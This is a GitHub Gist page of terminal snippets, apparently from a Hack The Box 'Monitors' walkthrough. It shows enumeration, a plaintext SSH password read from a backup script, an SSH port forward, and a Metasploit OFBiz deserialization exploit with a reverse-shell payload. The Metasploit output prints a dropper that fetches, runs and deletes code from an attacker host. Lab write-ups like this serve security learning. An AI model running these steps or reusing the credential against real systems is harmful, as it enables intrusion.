Skip to content

Instantly share code, notes, and snippets.

View oxtd's full-sized avatar
💭
I may be slow to respond.

Tushar De oxtd

💭
I may be slow to respond.
View GitHub Profile
@oxtd
oxtd / u.sh
Created September 11, 2021 06:48
u
www-data@monitors:/usr/share/cacti/cacti$ find / -name user.txt 2>/dev/null
/home/marcus/user.txt
www-data@monitors:/usr/share/cacti/cacti$ ls -la /home/marcus/user.txt
-r--r----- 1 root marcus 33 Sep 11 06:54 /home/marcus/user.txt
@oxtd
oxtd / 4.sh
Created September 11, 2021 06:50
4
www-data@monitors:/home/marcus$ ls -la
total 40
drwxr-xr-x 5 marcus marcus 4096 Jan 25 2021 .
drwxr-xr-x 3 root root 4096 Nov 10 2020 ..
d--x--x--x 2 marcus marcus 4096 Nov 10 2020 .backup
lrwxrwxrwx 1 root root 9 Nov 10 2020 .bash_history -> /dev/null
-rw-r--r-- 1 marcus marcus 220 Apr 4 2018 .bash_logout
-rw-r--r-- 1 marcus marcus 3771 Apr 4 2018 .bashrc
drwx------ 2 marcus marcus 4096 Jan 25 2021 .cache
drwx------ 3 marcus marcus 4096 Nov 10 2020 .gnupg
@oxtd
oxtd / 5.sh
Created September 11, 2021 06:56
5
www-data@monitors:/etc$ cat /home/marcus/.backup/backup.sh
#!/bin/bash
backup_name="cacti_backup"
config_pass="VerticalEdge2020"
zip /tmp/${backup_name}.zip /usr/share/cacti/cacti/*
sshpass -p "${config_pass}" scp /tmp/${backup_name} 192.168.1.14:/opt/backup_collection/${backup_name}.zip
rm /tmp/${backup_name}.zip
@oxtd
oxtd / 5.sh
Created September 11, 2021 06:57
5
www-data@monitors:/etc$ cat /home/marcus/.backup/backup.sh
#!/bin/bash
backup_name="cacti_backup"
config_pass="******************"
zip /tmp/${backup_name}.zip /usr/share/cacti/cacti/*
sshpass -p "${config_pass}" scp /tmp/${backup_name} 192.168.1.14:/opt/backup_collection/${backup_name}.zip
rm /tmp/${backup_name}.zip
@oxtd
oxtd / ssh.sh
Created September 11, 2021 07:00
ssh
ssh [email protected]
The authenticity of host '10.10.10.238 (10.10.10.238)' can't be established.
ECDSA key fingerprint is SHA256:qcinAnoUyOFIv8VZ0yXCnFRNmzc6Zghh1VbQQD43abI.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.238' (ECDSA) to the list of known hosts.
[email protected]'s password:
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-151-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
@oxtd
oxtd / 6.sh
Created September 11, 2021 07:03
6
marcus@monitors:~$ ifconfig
br-968a1c1855aa: flags=4099<UP,BROADCAST,MULTICAST> mtu 1500
inet 172.18.0.1 netmask 255.255.0.0 broadcast 172.18.255.255
ether 02:42:57:73:aa:3e txqueuelen 0 (Ethernet)
RX packets 0 bytes 0 (0.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 0 bytes 0 (0.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
docker0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
@oxtd
oxtd / 7.sh
Created September 11, 2021 07:04
7
marcus@monitors:~$ netstat -tulnp
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 '127.0.0.1:8443' 0.0.0.0:* LISTEN -
tcp6 0 0 :::80 :::* LISTEN -
@oxtd
oxtd / 8.sh
Created September 11, 2021 07:08
8
ssh -L 8443:127.0.0.1:8443 [email protected]
[email protected]'s password:
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-151-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Sat Sep 11 07:21:21 UTC 2021
@oxtd
oxtd / msf.sh
Created September 11, 2021 07:40
msf
msf6 exploit(linux/http/apache_ofbiz_deserialization) > set rhosts 127.0.0.1
rhosts => 127.0.0.1
msf6 exploit(linux/http/apache_ofbiz_deserialization) > set lhost 10.10.14.225
lhost => 10.10.14.225
msf6 exploit(linux/http/apache_ofbiz_deserialization) > set lport 9001
lport => 9001
msf6 exploit(linux/http/apache_ofbiz_deserialization) > set forceexploit true
forceexploit => true
msf6 exploit(linux/http/apache_ofbiz_deserialization) > set payload linux/x64/shell/reverse_tcp
payload => linux/x64/shell/reverse_tcp
@oxtd
oxtd / toor.sh
Created September 11, 2021 07:40
root
msf6 exploit(linux/http/apache_ofbiz_deserialization) > run
[*] Started reverse TCP handler on 10.10.14.225:9001
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The target is not exploitable. Target cannot deserialize arbitrary data. ForceExploit is enabled, proceeding with exploitation.
[*] Executing Linux Dropper for linux/x64/shell/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/tz2phtuggSUl
[*] Local IP: http://192.168.0.105:8080/tz2phtuggSUl
[+] Successfully executed command: curl -so /tmp/XUuAnwnl http://10.10.14.225:8080/tz2phtuggSUl;chmod +x /tmp/XUuAnwnl;/tmp/XUuAnwnl;rm -f /tmp/XUuAnwnl
[*] Command Stager progress - 100.00% done (117/117 bytes)